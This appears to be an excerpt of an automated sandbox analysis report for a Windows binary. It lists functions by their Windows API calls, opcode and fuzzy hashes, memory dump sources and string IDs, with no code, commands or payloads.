• Opcode ID: 88dfaff1decf84be5fbe8066ef46183c70eb39ac296e6e7da9a59cef3182031d
• Instruction ID: 6d9617afc45279b9301e9e7e17fc48dfec4fe9b63b94bd5422863d03648fe71f
• Opcode Fuzzy Hash: 88dfaff1decf84be5fbe8066ef46183c70eb39ac296e6e7da9a59cef3182031d
• Instruction Fuzzy Hash: D1419CB0604602EFDB10DF65C908B6AFBF4FF04714F1042A9E46897691D776E918CBA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetWindowLongW.USER32(00000003,000000FC), ref: 00BD2CE6
• SetWindowLongW.USER32(00000003,000000FC,?), ref: 00BD2CF8
• DeleteCriticalSection.KERNEL32(?,1FC3D414,?,?,?,?,00DAD5E4,000000FF), ref: 00BD2D23
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: LongWindow$CriticalDeleteSection
• String ID:
• API String ID: 1978754570-0
• Opcode ID: 6ee4d0f7e8583e0a694a4f90ee0b77b8b5760df406a0aa9ee634ad5733251ade
• Instruction ID: 181452dfe7d96b22dde9a9437b9f840687e4a8620ca2d7a83b4ddb2fce23d1ab
• Opcode Fuzzy Hash: 6ee4d0f7e8583e0a694a4f90ee0b77b8b5760df406a0aa9ee634ad5733251ade
• Instruction Fuzzy Hash: 3931A271904646BFCB11DF69CC04B99FBE8FF15310F24426AE864A7692E771E918CBA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00D851EB
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00D851F5
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00D85202
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 0be1b9c3e5ffeb7678be0f7b8716590f39a9039f3fb0c539cd4105cc96737219
• Instruction ID: 704aa801d29edd41f778e893df0b97fc9417df23d146038a915f97e7b3c19c01
• Opcode Fuzzy Hash: 0be1b9c3e5ffeb7678be0f7b8716590f39a9039f3fb0c539cd4105cc96737219
• Instruction Fuzzy Hash: 2A3105709412289BCB21EF24D98978DBBB8FF18710F1041EAE51CA7250EB309F858F64
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadResource.KERNEL32(00000000,00000000,1FC3D414,00000001,00000000,?,00000000,00DA7D20,000000FF,?,00BB9FAC,?,?,00BBA150,00000000,00000000), ref: 00BBA02B
• LockResource.KERNEL32(00000000,?,00BB9FAC,?,?,00BBA150,00000000,00000000,00000000,00BBA2B8,-00000010,?,00000000), ref: 00BBA036
• SizeofResource.KERNEL32(00000000,00000000,?,00BB9FAC,?,?,00BBA150,00000000,00000000,00000000,00BBA2B8,-00000010,?,00000000), ref: 00BBA044
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Resource$LoadLockSizeof
• String ID:
• API String ID: 2853612939-0
• Opcode ID: ffe0fa3fbaa47d42f455a39145db902bd704b6288e5a228c65a9e08265430627
• Instruction ID: 9ac33d4ecbe4c09d266556c91cea164e198bfd44419f75d90eb62ad82e3f3336
• Opcode Fuzzy Hash: ffe0fa3fbaa47d42f455a39145db902bd704b6288e5a228c65a9e08265430627
• Instruction Fuzzy Hash: C9110A72E046549FC7349F19DC44BBAF7ECEB88721F404A7BEC5AD3240EA759C048690
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 832ffafa89fc57beda716dce77b95418215a364c390a83f0d99b221e7f9869f1
• Instruction ID: 65c038aa0b013c92e0c4bb47a552dce42cc205b22647f4adeedc6d93052cb113
• Opcode Fuzzy Hash: 832ffafa89fc57beda716dce77b95418215a364c390a83f0d99b221e7f9869f1
• Instruction Fuzzy Hash: BAF12E71E012199FDF14CFA8D8806ADBBB1FF88314F198269E915EB391D730AD45CBA4
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
• SendMessageW.USER32(?,0000102B,00000000,00000001), ref: 00BDFB1B
• SendMessageW.USER32(?,0000102B,?,-00000002), ref: 00BDFD05
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetWindowLongW.USER32(00000000,000000FC), ref: 00C2410F
• SetWindowLongW.USER32(00000000,000000FC,?), ref: 00C2411D
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: LongWindow
• String ID:
• API String ID: 1378638983-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(00000000,?,1FC3D414,?,00000000,00000000,00000000,00DE82FD,000000FF), ref: 00CCE2D8
• FindClose.KERNEL32(00000000,?,1FC3D414,?,00000000,00000000,00000000,00DE82FD,000000FF), ref: 00CCE322
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: T$$|$
• API String ID: 0-3050406125
Uniqueness
Uniqueness Score: -1.00%

APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D9AEEC,?,?,00000008,?,?,00DA60D7,00000000), ref: 00D9B11E
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: ExceptionRaise__floor_pentium4
• String ID: unordered_map/set too long
• API String ID: 996205981-306623848
                                                                                                                                                                        • Opcode ID: 01c052dfe2774be74f53209eed02d8558f63ae7b2865e74b121b7fa6ff3a463e
                                                                                                                                                                        • Instruction ID: af13821673783f64a6f0c16bcbb24cd215022256e40ffffc29c4a58511df1645
                                                                                                                                                                        • Opcode Fuzzy Hash: 01c052dfe2774be74f53209eed02d8558f63ae7b2865e74b121b7fa6ff3a463e
                                                                                                                                                                        • Instruction Fuzzy Hash: C812E171A042199FCB14DF69D881AADFBF5FF48310F14826AE815EB791D730EA51CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • NtdllDefWindowProc_W.NTDLL(?,-00002000,?,?,00BD69C7,?,?,?,?,?,?,?,?,00BD6838,?,?), ref: 00BD82C0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: NtdllProc_Window
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4255912815-0
                                                                                                                                                                        • Opcode ID: 7d1db669a6b6dca841b7b81f278cc64a49d94b0c39c9918a67f62d600e2c0558
                                                                                                                                                                        • Instruction ID: 543bf414e0c8e78ab5f5d723ae697b10e6282b94d2ef7b8203bbc0d364c5b0df
                                                                                                                                                                        • Opcode Fuzzy Hash: 7d1db669a6b6dca841b7b81f278cc64a49d94b0c39c9918a67f62d600e2c0558
                                                                                                                                                                        • Instruction Fuzzy Hash: 95F0EC30008045DEE3018B58C858A6AFBFAFB44303F4845E7E48CC61A4EB359E48CF04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: \
                                                                                                                                                                        • API String ID: 0-2661760580
                                                                                                                                                                        • Opcode ID: caedae0df7b1b49e294ab011711e9d5728cd33889756f79b74aa4d23a063705a
                                                                                                                                                                        • Instruction ID: 482ac49154ea3cf4acbfbbd6d3cc0a2d933d995282ba5934f05241bcfda32533
                                                                                                                                                                        • Opcode Fuzzy Hash: caedae0df7b1b49e294ab011711e9d5728cd33889756f79b74aa4d23a063705a
                                                                                                                                                                        • Instruction Fuzzy Hash: CA31D0B1405B84CEE321CF29C558787BFF0BB05728F104A4DD4E65BB91D3BAA548CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 063ac306297a1acae322703489ab27f4154fd2a46d84afb9b53220a41c955082
                                                                                                                                                                        • Instruction ID: c97075aadab9eb55ad217183f7ba564e6a2724da877d36cc0593fa33a4fec1db
                                                                                                                                                                        • Opcode Fuzzy Hash: 063ac306297a1acae322703489ab27f4154fd2a46d84afb9b53220a41c955082
                                                                                                                                                                        • Instruction Fuzzy Hash: D8320631D29F414DDB639639CC22335A28AAFB73D4F15D727F81AB59A9EB29C4C34210
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: c329d795ea00013d229120067f8a766c0f0fd4eb8a6d35e16fc4c4cd0021b93a
                                                                                                                                                                        • Instruction ID: 8485c0087ca013db32c3492ba1f2552479c629ed7f5b2324fdf38a3106202f5c
                                                                                                                                                                        • Opcode Fuzzy Hash: c329d795ea00013d229120067f8a766c0f0fd4eb8a6d35e16fc4c4cd0021b93a
                                                                                                                                                                        • Instruction Fuzzy Hash: 20E1AF746006058FCB28EF68C580A7EB7F1FF45310BA84A5ED4969B291DB31ED42EB71
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 665de91e1ab19aeb1733474b606833366550689f13d45cbcb88c7976b9265d0e
                                                                                                                                                                        • Instruction ID: be89f5615487d5125835c9a13bdcf93fb64cdd7d9227d4ceef84aec053ae858b
                                                                                                                                                                        • Opcode Fuzzy Hash: 665de91e1ab19aeb1733474b606833366550689f13d45cbcb88c7976b9265d0e
                                                                                                                                                                        • Instruction Fuzzy Hash: 8F2149B1804788CFD710CF69C904B8ABBF4FB49318F11869ED455AB791D3B9AA48CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: cfce24a6b0e2cf1fa681d45dd5a45fff5e71c9696da1e88de0f375baf821b3bb
                                                                                                                                                                        • Instruction ID: 0bf61f40052a3e4085a6e8a20b2c41d9d430c395d3766ee09eb722d8a4b1c3dd
                                                                                                                                                                        • Opcode Fuzzy Hash: cfce24a6b0e2cf1fa681d45dd5a45fff5e71c9696da1e88de0f375baf821b3bb
• Instruction Fuzzy Hash: D8215BB1804788CFD710CF69C90478ABBF4FB49314F11869ED455AB7A1D3B9AA48CF90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eebe57e863219ab4253d290da95e945bba0299a685f2a2e6ec168446fc436cd8
• Instruction ID: 4f36de0eb21bc853555c07494150d3208869b880e59f6665c7f2e340e903dd02
• Opcode Fuzzy Hash: eebe57e863219ab4253d290da95e945bba0299a685f2a2e6ec168446fc436cd8
• Instruction Fuzzy Hash: 77F030326113249FCF2ACB4CD956A59B3A8EB45B61F51405AF501E7251C670DD00C7E1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
• Instruction ID: f4b6866c820b801f57025036b55a550c109e19236f1082453cc734f911646160
• Opcode Fuzzy Hash: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
• Instruction Fuzzy Hash: CFE08C32912228EBCB14DB9CC95498AF3ECEB45B40F15049AF501E3200C270DE40C7E0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 16a962eb7063aa5dac9a286c1eb4be0eb6ad47394398426903ba7e2235a18e8e
• Instruction ID: e4e8b65bfc718d184d3039c900df7d581cbe82ee76244d025d320fc1b0cc6bf8
• Opcode Fuzzy Hash: 16a962eb7063aa5dac9a286c1eb4be0eb6ad47394398426903ba7e2235a18e8e
• Instruction Fuzzy Hash: F9C08C34000A804BCE29A918C3B23A67354F391792F8824CEC9020BB43EA1EEC82D731
Uniqueness

Uniqueness Score: -1.00%

APIs
• InitializeCriticalSection.KERNEL32(00E9C5D0,1FC3D414,00000000), ref: 00CD6363
• EnterCriticalSection.KERNEL32(00E9C5D0,1FC3D414), ref: 00CD6378
• GetCurrentProcess.KERNEL32 ref: 00CD6385
• GetCurrentThread.KERNEL32 ref: 00CD6393
• LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,00000000), ref: 00CD642D
• GetProcAddress.KERNEL32(00000000), ref: 00CD6434
• __Init_thread_footer.LIBCMT ref: 00CD6448
• GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,0000001F,?,?,?,00000000), ref: 00CD667E
• LeaveCriticalSection.KERNEL32(00E9C5D0,?,00000000), ref: 00CD67BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: CriticalSection$Current$AddressEnterHandleInit_thread_footerInitializeLeaveLibraryLoadModuleProcProcessThread
• String ID: *** Stack Trace (x86) ***$,_$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
• API String ID: 1326996155-1203891687
• Opcode ID: 4a8b71fc080526ce5ce7b29557c152201a0a4796463cd95bc01b9f8a421455a7
• Instruction ID: c2782720e15a6f59f50ba0047e59aa022223e5e8ef634ebb1547efd29cc555fa
• Opcode Fuzzy Hash: 4a8b71fc080526ce5ce7b29557c152201a0a4796463cd95bc01b9f8a421455a7
• Instruction Fuzzy Hash: 5EF1F2719006589FDB24EF24CC88BAEB7B4EF44304F1442EAE559A7291DB759F88CF60
Uniqueness

Uniqueness Score: -1.00%

APIs
• InitializeCriticalSection.KERNEL32(00E9C5D0,1FC3D414,00000000), ref: 00CD6363
• EnterCriticalSection.KERNEL32(00E9C5D0,1FC3D414), ref: 00CD6378
• GetCurrentProcess.KERNEL32 ref: 00CD6385
• GetCurrentThread.KERNEL32 ref: 00CD6393
• LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,00000000), ref: 00CD642D
